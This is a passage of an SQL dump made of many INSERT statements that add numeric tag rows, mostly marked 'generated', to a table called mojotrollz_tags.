(14302, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14303, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14303, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14303, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14304, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14304, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14304, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14304, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14304, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14304, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14305, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14308, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14308, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14308, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14310, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14311, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14312, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14321, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14321, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14321, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14322, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14322, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14322, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14323, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14323, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14323, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14324, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14324, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14324, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14325, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14325, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14325, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14326, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14326, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14326, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14327, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14327, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14327, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14329, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14330, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14331, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14332, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14333, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14334, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14335, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14338, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14338, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14339, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14339, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14340, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14340, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14342, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14342, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14343, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14343, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14344, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14344, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14345, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14345, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14347, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14347, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14348, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14348, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14349, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14349, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14349, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14350, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14351, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14351, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14351, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14353, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14353, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14353, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14354, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14354, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14354, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14355, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14355, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14356, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14357, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14357, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14358, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14358, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14358, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14361, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14361, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14363, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14363, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14364, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14365, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14365, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14366, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14366, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14367, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14367, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14368, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14368, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14368, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14369, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14369, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14369, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14370, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14371, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14371, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14371, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14373, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14374, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14375, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14375, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14376, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14376, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14376, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14376, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14376, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14376, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14377, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14377, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14377, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14377, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14377, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14377, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14378, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14378, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14379, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14379, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14380, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14380, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14381, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14381, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14381, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14382, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14382, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14382, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14383, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14383, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14383, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14386, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14386, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14387, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14387, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14388, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14388, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14389, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14390, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14390, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14392, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14392, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14392, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14392, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14392, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14392, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14393, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14393, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14394, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14394, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14395, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14396, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14398, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14398, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14398, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14399, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14399, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14399, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14400, 1, 1, 429, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14400, 1, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14400, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14401, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14401, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14401, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14402, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14402, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14403, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14403, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14403, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14403, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14403, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14404, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14404, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14421, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14422, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14423, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14423, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14424, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14424, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14425, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14425, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14426, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14426, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14427, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14427, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14428, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14428, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14429, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14430, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14430, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14431, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14431, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14432, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14432, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14433, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14433, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14435, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14436, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14437, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14437, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14438, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14438, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14439, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14439, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14440, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14440, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14441, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14441, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14442, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14442, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14443, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14444, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14444, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (14445, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 